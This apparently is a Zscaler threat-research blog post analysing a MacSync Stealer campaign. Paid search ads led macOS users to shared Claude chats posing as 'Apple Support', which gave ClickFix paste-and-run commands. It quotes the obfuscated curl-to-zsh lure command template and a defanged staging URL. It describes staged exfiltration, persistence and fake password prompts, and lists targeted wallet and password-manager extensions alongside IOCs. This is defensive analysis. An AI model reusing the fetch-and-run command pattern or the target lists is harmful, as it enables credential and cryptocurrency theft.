Zscalerのブログ
Zscalerの最新ブログ情報を受信
ClaudeFix: Shared Claude Chats Meet ClickFix
Introduction
ClickFix is a widely employed attack technique, first seen in 2024, where a victim is instructed to paste-and-run instructions on their system to “fix” a problem or install software. The seemingly benign instructions are, in fact, malicious and lead to the deployment of malware onto the victim’s system. Zscaler Threat Hunting has identified recent ClickFix attacks abusing Anthropic’s Claude platform through the use of shareable Claude chats to host these instructions, which marks a shift from typical attacks. As AI platforms have grown in popularity, threat actors have increasingly abused legitimate features such as shareable chats to lend credibility to malicious content. In this blog post, the Zscaler Threat Hunting team examines a MacSync Stealer campaign distributed through shared Claude chats.
Note: Zscaler Threat Hunting notified Anthropic about the misuse of its platform, and the campaign’s shared chats were no longer accessible at the time of publishing this blog.
Key Takeaways
- The threat actors behind MacSync Stealer continue to evolve their techniques, tactics, and procedures (TTPs) by abusing AI platforms (such as Claude) to host ClickFix content and increase perceived legitimacy.
- The threat actor behind MacSync Stealer has shifted distribution from via fake “cracked” applications to the now-common ClickFix technique.
- Malvertising was a key part of this campaign. Attackers used paid ads to lure Mac users searching for Claude into shared Claude chats that instructed them to run ClickFix commands leading to the download of MacSync Stealer.
- MacSync Stealer is capable of stealing credentials, sensitive files, and cryptocurrency wallet data.
Technical Analysis
The Zscaler Threat Hunting team observed multiple stages in this ClickFix attack chain.
First stage
The victim searches for a term such as “claude download” in a search engine and sees a paid ad in the results that points to a shared Claude chat link. From the start, the use of the official Claude domain adds legitimacy to the search result. The victim clicks on the paid ad and is redirected to a shared Claude chat, as shown in the figure below.
.jpg)
Figure 1: MacSync Stealer ClickFix instructions hosted in a shared Claude chat.
Aside from the hosting platform itself being legitimate, threat actors also crafted the content to appear authentic. The chat is labeled “Shared by Apple Support” in the top right corner. The threat actors likely achieved this by setting their Claude display name as “Apple Support,” causing this label to appear when the shareable link is generated.
The installation command the victim is instructed to run is a curl command with the destination URL obfuscated using Base64 encoding. The command typically follows the format:
curl -kfsSL $(echo '[base64_string]'|base64 -D)|zsh The Base64-encoded string usually decodes to a URL in the format http://[domain]/curl/[a-f0-9]{64}$, which serves as the first stage of the MacSync Stealer infection. A curl request to this URL returns a Z shell (zsh) script, which is then piped directly to zsh, as specified at the end of the installation command.
An example of the MacSync Stealer staging URL is the following:
http://lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbThe zsh script returned from this URL contains a blob that is first Base64-decoded then decompressed using gzip to reveal a second-stage script. This second-stage script is executed in the terminal using the eval command shown at the end of the figure below.
.jpg)
Figure 2: Example Zsh script returned by the example first-stage URL distributing MacSync Stealer.
Second stage
Functionally, this second-stage zsh script first redirects all output to /dev/null, essentially hiding all visible indications of execution. Next, the script downloads the third stage of MacSync Stealer, which contains the core stealing functionality, from a URL in the format $domain/dynamic?txd=$token, using the HTTP header api-key: $api_key (the values of $domain, $token, and $api_key are hardcoded in the script). The downloaded content is then piped directly to osascript, leaving no file trace on the affected system.
Finally, the second-stage zsh script checks for the presence of a file named /tmp/osalogging.zip, which is expected to contain the sensitive information collected from the affected system. If the file exists and is non-zero in size, the script exfiltrates the collected data in 10MB chunks via HTTP PUT requests to a URL in the format:
$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks In this scheme, $domain and $token are hardcoded in the script, $upload_id is generated per system based on the date and a randomly generated number, $total_chunks is calculated by dividing the file size by 10MB, and $i is set by the loop counter as each chunk is sent. The script retries each chunk upload up to eight times if the upload fails.
After exfiltration is completed, the script deletes /tmp/osalogging.zip from the system, thereby leaving no trace of MacSync Stealer on the system.
Third stage
The third stage of the malware containing the core stealing functionality has the following capabilities:
Tries to access
~/Library/Cookies/, likely to gauge the access level at which the script is running. If access fails,- The malware modifies
~/.zshrcto append a curl command that downloads the MacSync second-stage script and pipes the output to zsh. The command has the same format as the command pasted and run by the user in the first stage. This functionality implements persistence ensuring the second-stage script is downloaded and executed each time the terminal is opened. - It also prompts the victim to grant full disk access by showing a prompt saying "Please allow access and reopen the terminal" with title "Full Disk Access required!" and then opening the Security & Privacy pane where this setting can be enabled.
If access is successful, the script removes the curl command implementing persistence from
~/.zshrcand continues with the steps below.- The malware modifies
- Creates the directory
/tmp/macsync_0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb.lockwhich serves as a lock file indicating the information stealer is running. - Tricks the victim into entering their macOS password by showing a fake prompt.
- Gathers stolen information into the directory
/tmp/sync[randomNumber]with the capabilities described in the table below:
Category | Capability |
|---|---|
Credential access
| Copies all keychain files ( |
Copies files from the folders | |
Copies browser files from Gecko-based browsers that may contain credentials ( | |
Searches for known browser extensions used as password managers in Chromium-based browsers and copies relevant local files into an | |
Discovery
| Performs system discovery and populates a file called |
Gathers information about running processes and writes the results to | |
Collection | Copies shell configuration and history files ( |
Copies Telegram application files from | |
Gathers files from selected directories ( | |
Cryptocurrency Chrome extension enumeration & collection | Searches for known Chromium extensions associated with cryptocurrency wallets and copies relevant local files into a |
Cryptocurrency desktop wallet application enumeration & collection | Copies entire folders corresponding to popular desktop cryptocurrency wallet applications into the |
Table 1: MacSync Stealer data theft capabilities.
- All data collected under
/tmp/sync[randomNumber]is compressed into/tmp/osalogging.zip, which is then exfiltrated as described in the previous stage. After creating the archive, MacSync Stealer deletes the/tmp/sync*directory and removes the lock directory. Finally, MacSync Stealer attempts to download three additional payloads if the applications Ledger Wallet, Ledger Live, and Trezor Suite respectively are present on the affected system from the following URLs:
lasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb
These payloads could not be retrieved at the time of analysis, but they are likely trojanized versions of the aforementioned applications.
Malvertising campaign observations
Since Zscaler Threat Hunting analyzes Zscaler Internet Access (ZIA) logs across customers, we were able to obtain broader visibility into the scope of this campaign. This campaign appears to have been short-lived, running from June 12–19, 2026. Based on the UTM parameters observed in the traffic, we determined the following:
- The source of the ad links was always Google.
- We observed 22 unique campaign IDs.
- We observed the following 7 unique utm_term values:
- claude
- claude ai
- claude code
- claude mac
- ai claude
- claude code desktop mac
- claude 客户 端 (client)
Zscaler Threat Hunting observed the malicious domains used in these ClickFix / MacSync Stealer campaigns adopted themes related to local services in U.S. cities. The list below shows a subset of domains following this pattern (a complete list is provided in the IOCs section at the end of this blog post):
realtorsmichigan[.]comcentralfloridapowerwash[.]comsyracusefertilitycenter[.]comdogtrainersgeorgia[.]comlasvegaslaminateflooring[.]commoldinspectiondayton[.]comnewjerseypetsitter[.]commiamipcsupport[.]comlifecoachrochester[.]comcabinrentalsnc[.]comfloridavacationvillarental[.]comlasvegasweddingreception[.]comdallasirrigationservices[.]comtoledotreeservices[.]comhomeinspectionsdelaware[.]comchicagometalscrap[.]com
We also observed Russian-language comments in the third-stage AppleScript payload, suggesting the threat actor behind these attacks is likely Russian-speaking. The table below shows examples of these comments and their translation:
Russian-Language Comment | Translation |
|---|---|
-- Простое копирование всех важных файлов (включая WAL/SHM) | -- Easily copy all important files (including WAL/SHM) |
-- Убрана хрупкая SafeSQLiteCopy (часто падала когда Firefox запущен) | -- Removed fragile SafeSQLiteCopy (frequently crashed when Firefox was running) |
Table 2: Russian-language comments and their corresponding translations.
Conclusion
This ClickFix campaign distributing MacSync Stealer shows how threat actors are increasingly abusing trusted platforms for attacks. In this case, attackers used malvertising to direct users to shared Claude chats that contained ClickFix “paste-and-run” commands. Running those commands triggered a multi-stage infection chain that ultimately deployed MacSync Stealer on macOS devices, enabling credential and data theft. The Zscaler Threat Hunting team continues to track this activity and provides detections and IOCs to help identify and block related threats.
Zscaler Coverage
Zscaler’s multilayered cloud security platform detects indicators related to MacSync at various levels with the following threat names:
Indicators Of Compromise (IOCs)
Analyzed kill chain indicators
lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb |
lasvegaslaminateflooring[.]com/dynamic?txd=0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb |
lasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb |
lasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb |
lasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb |
MacSync Stealer hosting domains
proviewhomeinspections[.]com |
meadow84[.]com |
pearlanvil14[[.]]com |
denverplumbingandwaterheater[.]com |
verse-57[.]com |
hawaiiwindowtinting[.]com |
slate16[.]com |
swisshomesforsale[.]com |
pine-1[.]com |
garagedoorskentucky[.]com |
quest-38[.]com |
floridakitchencabinet[.]com |
workshoplens[.]com |
shoresatin[.]com |
rudder93[.]com |
emberjourney18[.]com |
pearlswift16[.]com |
jozuvisuals[.]com |
harbor-29[.]com |
stratosnova14[.]com |
healthcareqai[.]com |
journey71[.]com |
gainesvillewebsitedesign[.]com |
dubaivehiclemart[.]com |
genomicsforge[.]com |
agingfighter[.]com |
workshopcurrent[.]com |
luxuryswisshomes[.]com |
majordubai[.]com |
ballad82[.]com |
quill-67[.]com |
coloradoaffordablelawyer[.]com |
glowworkshop15[.]com |
tide-39[.]com |
fablecube15[.]com |
realtorsmichigan[.]com |
centralfloridapowerwash[.]com |
pearl-49[.]com |
vineworkshop1[.]com |
syracusefertilitycenter[.]com |
havenaspen2[.]com |
plumechisel[.]com |
chant-78[.]com |
kiteshore[.]com |
georgia[.]com |
rudder-bloom[.]com |
advertisingeffectively[.]com |
kitefeather5[.]com |
dogtrainersgeorgia[.]com |
vibestride8[.]com |
conenctagent[.]com |
robscarpetcleaning[.]com |
pdrncosmetics[.]com |
satin87[.]com |
lasvegaslaminateflooring[.]com |
gatravelagency[.]com |
harvest-53[.]com |
trailshore17[.]com |
stratos37[.]com |
scope-quest[.]com |
moldinspectiondayton[.]com |
fern16[.]com |
kernel-frame[.]com |
newjerseypetsitter[.]com |
lyricopal1[.]com |
fern-76[.]com |
miamipcsupport[.]com |
languageschoolai[.]com |
lakevine8[.]com |
trekmesh15[.]com |
vinebridge12[.]com |
onyxkite[.]com |
summit86[.]com |
maplecirrus[.]com |
quartzleap5[.]com |
canvas-coral[.]com |
satin40[.]com |
anvil-wave[.]com |
buynewgymequipment[.]com |
renderframe20[.]com |
cabinrentalsnc[.]com |
slatesatin[.]com |
lifecoachrochester[.]com |
floridavacationvillarental[.]com |
anvillyric1[.]com |
leaflyric4[.]com |
garden13[.]com |
lasvegasweddingreception[.]com |
stitchstratos[.]com |
forgeboost16[.]com |
summit-68[.]com |
aspen32[.]com |
flintfeather5[.]com |
lens-kite[.]com |
quest-raster[.]com |
orbitstitch5[.]com |
chisel-perch[.]com |
balladspark[.]com |
delta-66[.]com |
meshfeed4[.]com |
dramshopliabilityattorney[.]com |
willow-blaze[.]com |
tide-maple[.]com |
nimbusstratos12[.]com |
blueprintmesh[.]com |
sreachagent[.]com |
dallasirrigationservices[.]com |
toledotreeservices[.]com |
aigenerativeos[.]com |
browserling[.]com |
kernelfable[.]com |
homeinspectionsdelaware[.]com |
driftpress11[.]com |
anvil-89[.]com |
quillchisel20[.]com |
codxeagent[.]com |
5x5web[.]com |
pinescope11[.]com |
chicagometalscrap[.]com |
rudderwillow8[.]com |
olympiapetemergency[.]com |
perch-74[.]com |
affordabletentrentals[.]com |
empexf[.]com |
699524[.]cc |
589669[.]cc |
625167[.]cc |
touristprogram[.]com |
yoauction[.]com |
forgequest2[.]com |
sdlasik[.]com |
charlottefilmstudios[.]com |
cedar-satin[.]com |
marbellaresales[.]com |
web-stat-2685[.]com |
smratagent[.]com |
seattlefilmstudios[.]com |
alabamarecoverycenter[.]com |
paeviction[.]com |
coloradoconstructionsupply[.]com |
byrnewealthmanagement[.]com |
homeinspectionnaperville[.]com |
orbitstride7[.]com |
vacationrentalvirginia[.]com |
unifiedaiapi[.]com |
iowagaragedoor[.]com |
bestbuydomain[.]com |
napavalleymentalhealth[.]com |
purtwre[.]com |
atlanticwoodworking[.]com |
pubre[.]com |
ursamade[.]com |
trailblazehealth[.]com |
znoeagent[.]com |
alluringsites[.]com |
api-metrics-5453[.]com |
ncsolarpanel[.]com |
apxeagent[.]com |
fullcolorprinters[.]com |
spotlessridesdetailing[.]com |
drivinguber[.]com |
wolfwraps[.]com |
curretagent[.]com |
elitefenceanddeck[.]com |
cashlessend[.]com |
buywx[.]com |
kitchenbathremodels[.]com |
aidevmaster[.]com |
dallasoverheaddoors[.]com |
aleeci[.]com |
trufflecatering[.]com |
ednasoftware[.]com |
jerryshvac[.]com |
kidsjumpandplay[.]com |
kirkcharlie[.]com |
cincycarpetcleaning[.]com |
beachjiujitsu[.]com |
whichitaautosales[.]com |
houstonpestcontrolcompany[.]com |
3plfast[.]com |
xprssit[.]com |
dualverify[.]com |
fredscarpetcleaning[.]com |
bcrealestateagency[.]com |
fractocode[.]com |
prmieagent[.]com |
coeragent[.]com |
suzke[.]com |
belldredgingpump[.]com |
kylesplumbing[.]com |
miamidadenotary[.]com |
nationalspacecouncil[.]com |
briskinternet[.]com |
modernhomeai[.]com |
sonyda[.]com |
envestassetmanagement[.]com |
thevenueapartments[.]com |
bitcoinlnwallet[.]com |
ideanica[.]com |
longbeachmartialarts[.]com |
stelaragent[.]com |
customroofingcontractors[.]com |
greenactiv[.]com |
lalandscapelighting[.]com |
arbokfind[.]com |
amedatur[.]com |
aisolutions247[.]com |
arbookfind[.]com |
Appendix
Targeted Chromium-based browsers
Browser Name | Browser-specific Local Path |
|---|---|
Yandex | /Users/[username]/Library/Application Support/Yandex/YandexBrowser/ |
Chrome | /Users/[username]/Library/Application Support/Google/Chrome/ |
Brave | /Users/[username]/Library/Application Support/BraveSoftware/Brave-Browser/ |
Edge | /Users/[username]/Library/Application Support/Microsoft Edge/ |
Vivaldi | /Users/[username]/Library/Application Support/Vivaldi/ |
Opera | /Users/[username]/Library/Application Support/com.operasoftware.Opera/ |
OperaGX | /Users/[username]/Library/Application Support/com.operasoftware.OperaGX/ |
Chrome Beta | /Users/[username]/Library/Application Support/Google/Chrome Beta/ |
Chrome Canary | /Users/[username]/Library/Application Support/Google/Chrome Canary |
Chromium | /Users/[username]/Library/Application Support/Chromium/ |
Chrome Dev | /Users/[username]/Library/Application Support/Google/Chrome Dev/ |
Arc | /Users/[username]/Library/Application Support/Arc/User Data |
Coccoc | /Users/[username]/Library/Application Support/CocCoc/Browser/ |
Targeted Gecko-based browsers
Browser Name | Browser-Specific Local Path |
|---|---|
Firefox | /Users/[username]/Library/Application Support/Firefox/Profiles/ |
Zen | /Users/[username]/Library/Application Support/zen/Profiles/ |
LibreWolf | /Users/[username]/Library/Application Support/LibreWolf/Profiles/ |
Waterfox | /Users/[username]/Library/Application Support/Waterfox/Profiles/ |
Targeted password manager extensions
Extension ID | Extension Name |
|---|---|
eiaeiblijfjekdanodkjadfinkhbfgcd | NordPass |
aeblfdkhhhdcdjpifhhbdiojplfjncoa | 1Password |
bfogiafebfohielmmehodmfbbebbbpei | Keeper |
nngceckbapebfimnlniiiahkandclblb | Bitwarden |
fdjamakpfbbddfjaooikfcpabgjikfkp | Dashlane |
hdokiejnpimakedhajhdlcegeplioahd | LastPass |
pnlccmojcmeohlpggmfnbbiapkmbliob | RoboForm |
ghmbeldphafepmbegfdlkpapadhbakde | Proton Pass |
kmcfomidfpdkfieipokbalgegidffkal | Enpass |
bnfdmghkeppfadphbnkjcicejfepnbfe | Sticky Password manager & safe |
caljgklbbfbcjjanaijlacgncafpegll | Avira Password Manager |
folnjigffmbjmcjgmbbfcpleeddaedal | LogMeOnce |
igkpcodhieompeloncfnbekccinhapdb | Zoho Vault |
admmjipmmciaobhojoghlmleefbicajg | Norton Password Manager |
ehpbfbahieociaeckccnklpdcmfaeegd | RememBear |
epanfjkfahimkgomnigadpkobaefekcd | IronVest |
didegimhafipceonhjepacocaffmoppf | Passbolt |
oboonakemofpalcgghocfoadofidjkkk | KeePassXC |
jgnfghanfbjmimbdmnjfofnbcgpkbegj | KeePassHelper |
mmhlniccooihdimnnjhamobppdhaolme | Kee - Password Manager |
dbfoemgnkgieejfkaddieamagdfepnff | 2FAS Auth |
bhghoamapcdpbohphigoooaddinpkbai | Authenticator |
lojeokmpinkpmpbakfkfpgfhpapbgdnd | Google Verified Access by Duo |
ibpjepoimpcdofeoalokgpjafnjonkpc | TOTP Authenticator |
gmohoglkppnemohbcgjakmgengkeaphi | 2FA Authenticator |
dckgbiealcgdhgjofgcignfngijpbgba | Open Two-Factor Authenticator |
gmegpkknicehidppoebnmbhndjigpica | Web2FA - Authenticator |
eiokpeobbgpinbmcanngjjbklmhlepan | MFAuth - 2FA Authenticator |
odfkmgboddhcgopllebhkbjhokpojigd | Authenticator Extension |
ppnbnpeolgkicgegkbkbjmhlideopiji | Microsoft Single Sign On |
cejfhijdfemlohmcjknpbeaohedoikpp | Secure TOTP Authenticator |
nmhjblhloefhbhgbfkdgdpjabaocnhha | mini authenticator |
iklgijhacenjgjgdnpnohbafpbmnccek | 2! Authenticator |
ppkkcfblhfgmdmefkmkoomenhgecbemi | Authenticator for PC |
lgndjfkadlbpaifdpbbobdodbaiaiakb | Authenticator App |
bbphmbmmpomfelajledgdkgclfekilei | Authenticator app |
Targeted cryptocurrency wallet extensions
Extension ID | Extension Name |
|---|---|
nkbihfbeogaeaoehlefnkodbefgpgknn | MetaMask |
bfnaelmomeimhlpmgjnjophhpkkoljpa | Phantom |
hnfanknocfeofbddgcijnmhnfnkdnaad | Coinbase Wallet extension |
fnjhmkhhmkbjkkabndcnnogagogbneec | Ronin Wallet |
acmacodkjbdgmoleebolmdjonilkdbch | Rabby Wallet |
egjidjbpglichdcondbcbdnbeeppgdph | Trust Wallet |
aholpfdialjgjfhomihkjbmgjidlcdno | Exodus Web3 Wallet |
pdliaogehgdbhbnmkklieghmmjkpigpa | Bybit Wallet |
mcohilncbfahbmgdjkbpemcciiolgcge | OKX Wallet |
hpglfhgfnhbgpjdenjgmdgoeiappafln | Guarda Crypto Wallet |
bhhhlbepdkbapadjdnnojkbgioiodbic | Solflare Wallet |
cjmkndjhnagcfbpiemnkdpomccnjblmj | Finnie |
kamfleanhcmjelnhaeljonilnmjpkcjc | Inspect - Crypto | NFTs | DeFi | Web3 |
jnldfbidonfeldmalbflbmlebbipcnle | Bitfinity Wallet |
fdcnegogpncmfejlfnffnofpngdiejii | Razor Wallet |
klnaejjgbibmhlephnhpmaofohgkpgkd | Bearby |
kjjebdkfeagdoogagbhepmbimaphnfln | Ultra Wallet |
ldinpeekobnhjjdofggfgjlcehhmanlj | Leather |
kpfchfdkjhcoekhdldggegebfakaaiog | FRWT Secure DeFi Crypto Wallet |
idnnbdplmphpflfnlkomgpfbpcgelopg | Xverse: Bitcoin Crypto Wallet |
mlhakagmgkmonhdonhkpjeebfphligng | ABC Wallet - Safe Web3 wallet |
bipdhagncpgaccgdbddmbpcabgjikfkn | Clown Wallet |
nhnkbkgjikgcigadomkphalanndcapjk | CLV Wallet |
klghhnkeealcohjjanjjdaeeggmfmlpl | Zerion Wallet: Crypto & DeFi |
ebfidpplhabeedpnhjnobghokpiioolj | Fewcha Move Wallet |
emeeapjkbcbpbpgaagfchmcgglmebnen | Surf Wallet |
fldfpgipfncgndfolcbkdeeknbbbnhcc | My Wallet: Crypto Wallet |
penjlddjkjgpnkllboccdgccekpkcbin | OpenMask - TON wallet |
hmeobnfnfcmdkdcmlblgagmfpfboieaf | Ctrl Wallet |
omaabbefbmiijedngplfjmnooppbclkk | Tonkeeper — wallet for TON |
jnlgamecbpmbajjfhmmmlhejkemejdma | Braavos: Bitcoin & Starknet Wallet |
fpkhgmpbidmiogeglndfbkegfdlnajnf | Cosmostation Wallet |
bifidjkcdpgfnlbcjpdkdcnbiooooblg | Fuelet Wallet | Fuel |
amkmjjmmflddogmhpjloimipbofnfjih | Wombat - Gaming Wallet for Ethereum & EOS |
aeachknmefphepccionboohckonoeemg | Coin98 Wallet Extension: Crypto & Defi |
dmkamcknogkgcdfhhbddcghachkejeap | Keplr |
aiifbnbfobpmeekipheeijimdpnlpgpp | Station Wallet |
ehgjhhccekdedpbkifaojjaefeohnoea | Ambire Web3 Wallet |
nknhiehlklippafakaeklbeglecifhad | Nabox Wallet |
nphplpgoakhhjchkkhmiggakijnkhfnd | TON Wallet |
ibnejdfjmmkpcnlpebklmnkoeoihofec | TronLink |
afbcbjpbpfadlkmhmclhkeeodmamcflc | MathWallet |
efbglgofoippbgcjepnhiblaibcnclgk | Martian Aptos & Sui Wallet Extension |
fccgmnglbhajioalokbcidhcaikhlcpm | Zapit: Crypto Wallet & P2P Exchange |
mgffkfbidihjpoaomajlbgchddlicgpn | Pali Wallet |
fopmedgnkfpebgllppeddmmochcookhc | Suku Wallet |
jojhfeoedkpkglbfimdfabpdfjaoolaf | Polymesh Wallet |
abkahkcbhngaebpcgfmhkoioedceoigp | Casper Wallet |
gkeelndblnomfmjnophbhfhcjbcnemka | Bitverse Wallet |
hgbeiipamcgbdjhfflifkgehomnmglgk | Harbor - Crypto Wallet |
ellkdbaphhldpeajbepobaecooaoafpg | ASI Alliance Wallet |
mdnaglckomeedfbogeajfajofmfgpoae | Energy8 Wallet |
ckklhkaabbmdjkahiaaplikpdddkenic | Internet Money | Crypto Wallet |
fmblappgoiilbgafhjklehhfifbdocee | Forbole X |
cnmamaachppnkjgnildpdmkaakejnhae | Auro Wallet |
fijngjgcjhjmmpcmkeiomlglpeiijkld | Talisman Wallet |
lbjapbcmmceacocpimbpbidpgmlmoaao | Metalet |
ibljocddagjghmlpgihahamcghfggcjc | Virgo Wallet |
gkodhkbmiflnmkipcmlhhgadebbeijhh | Soter | Aleo Wallet |
dbgnhckhnppddckangcjbkjnlddbjkna | Fin Wallet For Sei |
agoakfejjabomempkjlepdflaleeobhb | Core Wallet: Crypto Made Easy |
dgiehkgfknklegdhekgeabnhgfjhbajd | Komodo Wallet |
onhogfjeacnfoofkfgppdlbmlmnplgbn | SubWallet - Polkadot Wallet |
ojggmchlghnjlapmfbnjholfjkiidbch | Venom Wallet |
pmmnimefaichbcnbndcfpaagbepnjaig | FoxWallet |
anokgmphncpekkhclmingpimjmcooifb | Compass Wallet |
kkpllkodjeloidieedojogacfhpaihoh | Enkrypt: ETH, BTC and Solana Wallet |
iokeahhehimjnekafflcihljlcjccdbe | Alby - Bitcoin Wallet for Lightning & Nostr |
ifckdpamphokdglkkdomedpdegcjhjdp | ONTO Wallet |
loinekcabhlmhjjbocijdoimmejangoa | Glass wallet | Sui wallet |
fcfcfllfndlomdhbehjjcoimbgofdncg | Leap Wallet Extension |
ifclboecfhkjbpmhgehodcjpciihhmif | Klever Wallet |
ookjlbkiijinhpmnjffcofjonbfbgaoc | Temple Wallet |
oafedfoadhdjjcipmcbecikgokpaphjk | CoinWallet: BTC Crypto Wallet |
mapbhaebnddapnmifbbkgeedkeplgjmf | Biport Wallet |
lgmpcpglpngdoalbgeoldeajfclnhafa | SafePal Extension Wallet |
ppbibelpcjmhbdihakflkdcoccbgbkpo | UniSat Wallet |
ffnbelfdoeiohenkjibnmadjiehjhajb | SecondFi (Yoroi) |
opcgpfmipidbgpenhmajoajpbobppdil | Slush — A Sui wallet |
hdkobeeifhdplocklknbnejdelgagbao | Crypto wallet – Bitcoin & USDT |
lnnnmfcpbkafcpgdilckhmhbkkbpkmid | Koala Wallet |
nbdhibgjnjpnkajaghbffjbkcgljfgdi | Ramper Wallet |
kmhcihpebfmpgmihbkipcmlmmioameka | - |
kmphdnilpmdejikjdnlbcnmnabepfgkh | OsmWallet - Your XRP wallet. |
khpkpbbcccdmmclmpigdgddabeilkdpd | Suiet Sui Wallet |
dlcobpjiigpikoobohmabehhmhfoodbb | Ready X |
mkpegjkblkkefacfnmkajcjmabijhclg | Magic Eden Wallet |
dldjpboieedgcmpkchcjcbijingjcgok | Fuel Wallet |
jiidiaalihmmhddjgbnbgdfflelocpak | Bitget Wallet - Crypto, Web3 | Bitcoin & USDT |
Targeted desktop wallet application folders
/Users/[username]/Library/Application Support/Exodus/ |
/Users/[username]/.electrum/wallets/ |
/Users/[username]/Library/Application Support/Atomic Wallet/Local Storage/leveldb/ |
/Users/[username]/Library/Application Support/Guarda/ |
/Users/[username]/Library/Application Support/Coinomi/wallets/ |
/Users/[username]/.sparrow/wallets/ |
/Users/[username]/.walletwasabi/client/Wallets/ |
/Users/[username]/Library/Application Support/Bitcoin/ |
/Users/[username]/Library/Application Support/Armory/ |
/Users/[username]/.electron-cash/wallets/ |
/Users/[username]/.bitmonero/wallets/ |
/Users/[username]/Library/Application Support/Litecoin/ |
/Users/[username]/Library/Application Support/DashCore/ |
/Users/[username]/Library/Application Support/Dogecoin/ |
/Users/[username]/.electrum-ltc/wallets/ |
/Users/[username]/Library/Application Support/BlueWallet/ |
/Users/[username]/Library/Application Support/Zengo/ |
/Users/[username]/Library/Application Support/Trust Wallet/ |
/Users/[username]/Library/Application Support/Ledger Live/ |
/Users/[username]/Library/Application Support/Ledger Wallet/ |
/Users/[username]/Library/Application Support/@trezor |
このブログは役に立ちましたか?
免責事項:このブログは、Zscalerが情報提供のみを目的として作成したものであり、「現状のまま」提供されています。記載された内容の正確性、完全性、信頼性については一切保証されません。Zscalerは、ブログ内の情報の誤りや欠如、またはその情報に基づいて行われるいかなる行為に関して一切の責任を負いません。また、ブログ内でリンクされているサードパーティーのWebサイトおよびリソースは、利便性のみを目的として提供されており、その内容や運用についても一切の責任を負いません。すべての内容は予告なく変更される場合があります。このブログにアクセスすることで、これらの条件に同意し、情報の確認および使用は自己責任で行うことを理解したものとみなされます。



